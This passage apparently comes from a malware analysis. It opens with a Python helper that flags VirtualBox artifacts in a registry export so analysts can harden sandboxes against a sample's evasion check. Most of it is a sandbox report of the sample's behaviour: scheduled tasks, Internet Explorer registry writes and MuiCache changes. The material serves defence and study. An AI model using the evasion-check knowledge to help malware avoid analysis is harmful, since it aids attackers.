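        if n and current is not None:
            tok = _token(n.group("name"))
            if tok:
                hits.append((current, "FriendlyName", n.group("name"), tok))
    return hits


# Constructed export: a stock VirtualBox guest disk plus one physical-looking disk.
SAMPLE_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_VBOX&Prod_HARDDISK]

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_VBOX&Prod_HARDDISK\4&1e3a2b5c&0&000000]
"FriendlyName"="VBOX HARDDISK"
"DeviceDesc"="@disk.inf,%disk_devdesc%;Disk drive"

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Samsung&Prod_SSD_870_EVO\4&1e3a2b5c&0&010000]
"FriendlyName"="Samsung SSD 870 EVO"
"""
```

On the constructed export, hypervisor_artifacts(SAMPLE_EXPORT) returns three hits, all on the VBOX entries, and nothing for the Samsung disk. Any hit means a sample performing the same lookup as toolspub2.exe will see the sandbox; rename or remove the offending strings in the guest's virtual disk configuration before relying on the image.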

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{7FD0E911-67C2-11EE-8C03-7EFDAE50F694} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 102c0c61cffbd901 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{7F6E2FA1-67C2-11EE-8C03-7EFDAE50F694} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000bbd2da6efca7814e97bd67c6ea97aa8b000000000200000000001066000000010000200000004c99a625b3bec901614e239406c17896644c7539db85de90cc834afda0d169b8000000000e8000000002000020000000118694e9f8cd26a3e66c4fa55b97dcdd10e758d1ef00817a75f5cb004e1974f120000000ba30b45e700e3b5808310c74437540c83097fbe073f0b0b61b847ba1b751df3340000000d52a4e729970a07b3ab19be4c60ece2a6fe4359d7d7dfe4c5c14268dc54325a730d1c0655c7c6d23616e62804412ba741de10af3a31382e898be14464f5c0812 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = [binary value not preserved in this copy] C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "403141429" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-522 = "N. Central Asia Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-502 = "Nepal Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-152 = "Central America Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-422 = "Russian Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-602 = "Taipei Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-472 = "Ekaterinburg Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-1 = "IPsec Relying Party" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-101 = "Provides RD Gateway enforcement for NAP" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-103 = "Microsoft Corporation" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-461 = "Afghanistan Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-102 = "1.0" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-471 = "Ekaterinburg Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-581 = "North Asia East Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-551 = "North Asia Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-103 = "1.0" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-100 = "EAP Quarantine Enforcement Client" C:\Windows\system32\netsh.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
